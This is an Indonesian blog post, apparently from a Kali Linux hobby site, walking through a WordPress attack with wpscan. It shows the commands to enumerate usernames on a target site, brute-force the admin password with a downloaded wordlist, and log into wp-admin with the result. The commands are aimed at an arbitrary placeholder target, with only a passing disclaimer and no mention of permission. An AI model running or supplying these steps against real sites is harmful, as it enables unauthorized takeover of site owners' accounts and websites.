Assalamualaikum
~salam linuxers setelah ane share sqlmap kali linux ane mw share cara menggunakan wpscan. (Wordpress pentesting), tentuNya di kali linux
oke langsung saja gak usah berlama lama coeg!
1. Buka terminal anda ketikan perintah
~# wpscan --url http://targetwordpress.com --enumerate u
~# --url : target yang kamu siapkan
~# --enumerate: scan
~# u : username
2. Tunggu saja sampai prosses scanning selesai
3. di situ akan muncul username dan login name Nya di sini login : admin username : admin01 yang di pakai buat login adalah name yang pertama !
4. sekarang kita akan dump password menggunakan perintah
~# wpscan --url http://targetwordpress.com --wordlist /root/list.txt --username admin
~# --wordlist : daftar password anda
~# /root/list.txt : file daftar password yang akan brute force password !
~# --username : sesuai username yang anda dapatkan
Wordlist bisa anda dapatkan cari di google banyak :)
5. udah dapet passwordNya tinggal login
http://targetwordpress.com/wp-admin
atau
http://targetwordpress.com/wp-login.php
:) Happy Pentesting.
Jika kurang jelas bisa di lihat video berikut ;
#kami tidak mensarankan anda untuk merusak web!.
~salam linuxers
0 comments:
Post a Comment